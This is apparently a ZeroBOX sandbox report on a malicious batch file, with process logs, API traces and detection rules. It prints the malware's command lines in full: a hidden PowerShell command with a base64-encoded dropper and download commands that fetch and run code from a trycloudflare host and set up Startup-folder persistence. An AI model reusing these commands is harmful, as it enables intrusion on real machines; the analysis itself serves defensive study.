Summary | ZeroBOX

sch.bat

Generic Malware Downloader Antivirus FTP Code injection DGA Escalate privileges Socket ScreenShot Create Service KeyLogger Sniff Audio P2P Internet API DNS Http API HTTP Steal credential PWS AntiVM AntiDebug
Category  Machine        Started                     Completed
FILE      s1_win7_x6401  April 23, 2025, 10:08 a.m.  April 23, 2025, 10:15 a.m.
Size 3.5KB
Type DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 fcbebab50efe0c09cafacca4f008e31d
SHA256 7b7caef32f7a2cc066ead6fa099b8882082b39417638fd9175f72c5207bcb1a0
CRC32 933BEF9D
ssdeep 96:zr+HmGjUOjwjo61c6VWRLGLUArzfGmBJBfgaf:2wf1lstu/rX4O
Yara None matched

  • cmd.exe (PID 2540): "C:\Windows\System32\cmd.exe" /c start /wait "IALlcyCOe" C:\Users\test22\AppData\Local\Temp\sch.bat
    • cmd.exe (PID 2612): C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\sch.bat
      • powershell.exe (PID 2700): powershell -NoP -NonI -W Hidden -Exec Bypass -C "$b64='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';$b=[System.Convert]::FromBase64String($b64);$s=[System.Text.Encoding]::ASCII.GetString($b);$f='obf-sch_decoded.bat';Set-Content -Path $f -Value $s;Start-Process $f -WindowStyle Hidden"

Name  Response  Post-Analysis Lookup
No hosts contacted.

IP Address  Status  Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API         Arguments                  Status  Return  Repeated
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameA   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameA   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
GetComputerNameA   computer_name: TEST22-PC   1       1       0
GetComputerNameW   computer_name: TEST22-PC   1       1       0
Time & API          Arguments   Status / Return / Repeated
IsDebuggerPresent               0 0
IsDebuggerPresent               0 0
IsDebuggerPresent               0 0
Time & API     Status  Return  Repeated  console_handle  buffer
WriteConsoleW  1       1       0         0x00000007      Downloading file...
WriteConsoleW  1       1       0         0x00000007      Opening file: C:\Users\test22\AppData\Local\Temp\sch.pdf
WriteConsoleW  1       1       0         0x0000000b      The system cannot find the file C:\Users\test22\AppData\Local\Temp\sch.pdf.
WriteConsoleW  1       1       0         0x00000007      Downloading Python installer...
WriteConsoleW  1       1       0         0x00000007      Installing Python 3.12.5...
WriteConsoleW  1       1       0         0x0000000b      'C:\Users\test22\AppData\Roaming\python-3.12.5-amd64.exe' is not recognized as an internal or external command, operable program or batch file.
WriteConsoleW  1       1       0         0x00000007      Python installation failed.
WriteConsoleW  1       1       0         0x00000023      Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
WriteConsoleW  1       1       0         0x0000002f      SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
WriteConsoleW  1       1       0         0x0000003b      lowing enumeration values and try again. The possible enumeration values are "S
WriteConsoleW  1       1       0         0x00000047      sl3, Tls"."
WriteConsoleW  1       1       0         0x00000053      At line:1 char:32
WriteConsoleW  1       1       0         0x0000005f      + & { [Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocol
WriteConsoleW  1       1       0         0x0000006b      Type]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.t
WriteConsoleW  1       1       0         0x00000077      rycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch.
WriteConsoleW  1       1       0         0x00000083      pdf' }
WriteConsoleW  1       1       0         0x0000008f      + CategoryInfo : InvalidOperation: (:) [], RuntimeException
WriteConsoleW  1       1       0         0x0000009b      + FullyQualifiedErrorId : PropertyAssignmentException
WriteConsoleW  1       1       0         0x000000bb      The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio
WriteConsoleW  1       1       0         0x000000c7      n, script file, or operable program. Check the spelling of the name, or if a pa
WriteConsoleW  1       1       0         0x000000d3      th was included, verify that the path is correct and try again.
WriteConsoleW  1       1       0         0x000000df      At line:1 char:103
WriteConsoleW  1       1       0         0x000000eb      + & { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]:
WriteConsoleW  1       1       0         0x000000f7      :Tls12; Invoke-WebRequest <<<< -Uri 'https://arbitrary-brutal-desperate-page.t
WriteConsoleW  1       1       0         0x00000103      rycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch.
WriteConsoleW  1       1       0         0x0000010f      pdf' }
WriteConsoleW  1       1       0         0x0000011b      + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C
WriteConsoleW  1       1       0         0x00000127      ommandNotFoundException
WriteConsoleW  1       1       0         0x00000133      + FullyQualifiedErrorId : CommandNotFoundException
WriteConsoleW  1       1       0         0x00000023      Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
WriteConsoleW  1       1       0         0x0000002f      SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
WriteConsoleW  1       1       0         0x0000003b      lowing enumeration values and try again. The possible enumeration values are "S
WriteConsoleW  1       1       0         0x00000047      sl3, Tls"."
WriteConsoleW  1       1       0         0x00000053      At line:1 char:32
WriteConsoleW  1       1       0         0x0000005f      + & { [Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocol
WriteConsoleW  1       1       0         0x0000006b      Type]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.t
WriteConsoleW  1       1       0         0x00000077      rycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roa
WriteConsoleW  1       1       0         0x00000083      ming\python-3.12.5-amd64.exe' }
WriteConsoleW  1       1       0         0x0000008f      + CategoryInfo : InvalidOperation: (:) [], RuntimeException
WriteConsoleW  1       1       0         0x0000009b      + FullyQualifiedErrorId : PropertyAssignmentException
WriteConsoleW  1       1       0         0x000000bb      The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio
WriteConsoleW  1       1       0         0x000000c7      n, script file, or operable program. Check the spelling of the name, or if a pa
WriteConsoleW  1       1       0         0x000000d3      th was included, verify that the path is correct and try again.
WriteConsoleW  1       1       0         0x000000df      At line:1 char:103
WriteConsoleW  1       1       0         0x000000eb      + & { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]:
WriteConsoleW  1       1       0         0x000000f7      :Tls12; Invoke-WebRequest <<<< -Uri 'https://arbitrary-brutal-desperate-page.t
WriteConsoleW  1       1       0         0x00000103      rycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roa
WriteConsoleW  1       1       0         0x0000010f      ming\python-3.12.5-amd64.exe' }
WriteConsoleW  1       1       0         0x0000011b      + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C
WriteConsoleW  1       1       0         0x00000127      ommandNotFoundException
Time & API      crypto_handle  buffer             flags  crypto_export_handle  blob_type  Status  Return  Repeated
CryptExportKey  0x00684cd0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x006856d0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x006856d0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x006856d0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x006856d0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x006856d0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x006856d0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00684b10     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00684b10     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00684b10     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x006853d0     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685510     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685850     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x00685790     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x002baa18     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x002bb2d8     <INVALID POINTER>  0      0x00000000            6          1       1       0
CryptExportKey  0x002bb2d8     <INVALID POINTER>  0      0x00000000            6          1       1       0
Time & API            Arguments   Status  Return  Repeated
GlobalMemoryStatusEx              1       1       0
Time & API               process_identifier  region_size / length  protection                   base_address  allocation_type     process_handle  stack_dep_bypass  stack_pivoted  heap_dep_bypass  Status  Return  Repeated
NtAllocateVirtualMemory  2700                1703936               64 (PAGE_EXECUTE_READWRITE)  0x028a0000    8192 (MEM_RESERVE)  0xffffffff      0                 0              0                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x02a00000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtProtectVirtualMemory   2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x72891000    -                   0xffffffff      0                 0              0                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x0229a000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtProtectVirtualMemory   2700                8192                  64 (PAGE_EXECUTE_READWRITE)  0x72892000    -                   0xffffffff      0                 0              0                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x02292000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x022a2000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x02a01000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                8192                  64 (PAGE_EXECUTE_READWRITE)  0x02a02000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026da000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x022a3000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x022a4000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026eb000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026e7000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x0229b000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d2000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026e5000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x022a5000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026dc000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x02970000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x022a6000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026ec000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d3000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d4000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d5000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d6000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d7000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d8000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x026d9000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb0000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb1000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb2000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb3000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb4000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb5000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb6000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb7000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb8000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cb9000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cba000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cbb000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cbc000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cbd000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cbe000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x04cbf000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x05040000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x05041000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x05042000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x05043000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
NtAllocateVirtualMemory  2700                4096                  64 (PAGE_EXECUTE_READWRITE)  0x05044000    4096 (MEM_COMMIT)   0xffffffff      0                 0              1                1       0       0
file C:\Users\test22\AppData\Local\Temp\obf-sch_decoded.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roaming\python-3.12.5-amd64.exe' }"
cmdline powershell -NoP -NonI -W Hidden -Exec Bypass -C "$b64='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';$b=[System.Convert]::FromBase64String($b64);$s=[System.Text.Encoding]::ASCII.GetString($b);$f='obf-sch_decoded.bat';Set-Content -Path $f -Value $s;Start-Process $f -WindowStyle Hidden"
cmdline powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch.pdf' }"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2704
thread_handle: 0x00000088
process_identifier: 2700
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -NoP -NonI -W Hidden -Exec Bypass -C "$b64='QGVjaG8gb2ZmDQpzZXRsb2NhbA0KDQo6OiBTZXQgdGhlIGJhc2UgVVJMIGZvciBkb3dubG9hZHMNCnNldCAiYmFzZVVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20iDQoNCjo6IERvd25sb2FkIHRoZSBmaWxlIChlLmcuLCBpbWFnZSBvciBXb3JkIGRvY3VtZW50KQ0Kc2V0ICJmaWxlVXJsPSViYXNlVXJsJS9wZGYvc2NoLnBkZiINCnNldCAiZmlsZURlc3RpbmF0aW9uPSVURU1QJVxzY2gucGRmIg0KZWNobyBEb3dubG9hZGluZyBmaWxlLi4uDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgW05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdOjpUbHMxMjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWZpbGVVcmwlJyAtT3V0RmlsZSAnJWZpbGVEZXN0aW5hdGlvbiUnIH0iDQoNCjo6IE9wZW4gdGhlIGZpbGUNCmVjaG8gT3BlbmluZyBmaWxlOiAlZmlsZURlc3RpbmF0aW9uJQ0Kc3RhcnQgIiIgIiVmaWxlRGVzdGluYXRpb24lIg0KDQo6OiBTZXQgUHl0aG9uIGluc3RhbGxlciBVUkwgYW5kIGRvd25sb2FkIGxvY2F0aW9uDQpzZXQgInB5dGhvblVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20vcHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgInB5dGhvbkluc3RhbGxlcj0lQVBQREFUQSVccHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgImluc3RhbGxEaXI9JUFQUERBVEElXFB5dGhvblxQeXRob24zLjEyLjUiDQoNCjo6IERvd25sb2FkIHRoZSBQeXRob24gaW5zdGFsbGVyDQplY2hvIERvd25sb2FkaW5nIFB5dGhvbiBpbnN0YWxsZXIuLi4NCnBvd2Vyc2hlbGwgLUNvbW1hbmQgIiYgeyBbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICclcHl0aG9uVXJsJScgLU91dEZpbGUgJyVweXRob25JbnN0YWxsZXIlJyB9Ig0KDQo6OiBJbnN0YWxsIFB5dGhvbiB3aXRoIHVzZXIgcHJpdmlsZWdlcyAobm8gYWRtaW4gcmVxdWlyZWQpDQplY2hvIEluc3RhbGxpbmcgUHl0aG9uIDMuMTIuNS4uLg0KJXB5dGhvbkluc3RhbGxlciUgL3F1aWV0IEluc3RhbGxBbGxVc2Vycz0wIFRhcmdldERpcj0laW5zdGFsbERpciUgUHJlcGVuZFBhdGg9MQ0KaWYgJUVSUk9STEVWRUwlIG5lcSAwICgNCiAgICBlY2hvIFB5dGhvbiBpbnN0YWxsYXRpb24gZmFpbGVkLg0KICAgIGV4aXQgL2IgMQ0KKQ0KDQo6OiBDbGVhbiB1cCBpbnN0YWxsZXINCmRlbCAlcHl0aG9uSW5zdGFsbGVyJQ0KDQo6OiBEb3dubG9hZCBQeXRob24gc2NyaXB0cyB0byB0aGUgUHl0aG9uIGluc3RhbGxhdGlvbiBkaXJlY3RvcnkNCmVjaG8gRG93bmxvYWRpbmcgUHl0aG9uIHNjcmlwdHMuLi4NCmlmIG5vdCBleGlzdCAiJWluc3RhbGxEaXIlIiBta2RpciAiJWluc3RhbGxEaXIlIg0KDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWJhc2VVcmwlLzkxMS5weScgLU91dEZpbGUgJyVpbnN0YWxsRGlyJVw5MTEucHknIH0iDQoNCjo6IE5hdmlnYXRlIHRvIHRoZSBQeXRob24gaW5zdGFsbGF0aW9uIGRpcmVjdG9yeSBhbmQgcnVuIHRoZSBzY3JpcHRzIGluIHRoZSBiYWNrZ3JvdW5kDQplY2hvIFJ1bm5pbmcgUHl0aG9uIHNjcmlwdHMgaW4gdGhlIGJhY2tncm91bmQuLi4NCmNkIC9kICIlaW5zdGFsbERpciUiDQpzdGFydCAvYiAiIiAiJWluc3RhbGxEaXIlXHB5dGhvbi5leGUiIDkxMS5weQ0KDQo6OiBEb3dubG9hZCB0aGUgc3RhcnQuY21kIGZpbGUgYW5kIHBsYWNlIGl0IGluIHRoZSBzdGFydHVwIGZvbGRlcg0KZWNobyBEb3dubG9hZGluZyBzdGFydC5jbWQgZmlsZS4uLg0Kc2V0ICJjbWRVcmw9JWJhc2VVcmwlL3N0YXJ0LmNtZCINCnNldCAiY21kRGVzdGluYXRpb249JUFQUERBVEElXHVwZGF0ZS5jbWQiDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWNtZFVybCUnIC1PdXRGaWxlICclY21kRGVzdGluYXRpb24lJyB9Ig0KDQo6OiBNb3ZlIHN0YXJ0LmNtZCB0byB0aGUgc3RhcnR1cCBmb2xkZXINCmVjaG8gTW92aW5nIHN0YXJ0LmNtZCBmaWxlIHRvIHN0YXJ0dXAgZm9sZGVyLi4uDQpzZXQgInN0YXJ0dXBGb2xkZXI9JUFQUERBVEElXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cCINCm1vdmUgIiVjbWREZXN0aW5hdGlvbiUiICIlc3RhcnR1cEZvbGRlciUiDQoNCjo6IENsZWFuIHVwDQplY2hvIENsZWFuaW5nIHVwLi4uDQoNCjo6IEhpZGUgdGhlIFB5dGhvbiBpbnN0YWxsYXRpb24gZm9sZGVyDQphdHRyaWIgK2ggIiVpbnN0YWxsRGlyJSINCg0KOjogU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQNCmVjaG8gU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQuDQplbmRsb2NhbA==';$b=[System.Convert]::FromBase64String($b64);$s=[System.Text.Encoding]::ASCII.GetString($b);$f='obf-sch_decoded.bat';Set-Content -Path $f -Value $s;Start-Process $f -WindowStyle Hidden"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: obf-sch_decoded.bat
parameters:
filepath: obf-sch_decoded.bat
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
